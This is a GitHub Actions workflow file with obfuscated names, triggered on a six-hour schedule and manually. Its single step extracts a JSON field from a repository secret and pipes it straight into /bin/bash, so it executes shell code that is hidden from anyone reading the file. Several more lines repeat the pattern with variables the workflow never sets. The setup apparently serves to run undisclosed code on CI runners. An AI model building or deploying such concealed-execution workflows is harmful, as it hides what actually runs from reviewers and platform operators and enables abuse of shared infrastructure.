name: jitanyit

on:
  workflow_dispatch:
  schedule:
    - cron: '11 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jitanyit
        env:
          m02110: ${{ secrets.m02110 }}
        run: |
          echo $m02110 | jq -r .fi4670 | /bin/bash
          echo $arjku9 | jq -r .zvw21158 | /bin/bash
          echo $zds874 | jq -r .wko870 | /bin/bash
          echo $aab2032 | jq -r .r8896 | /bin/bash
          echo $nslx23298 | jq -r .bv74971 | /bin/bash
          echo $npfkz09 | jq -r .x33933 | /bin/bash

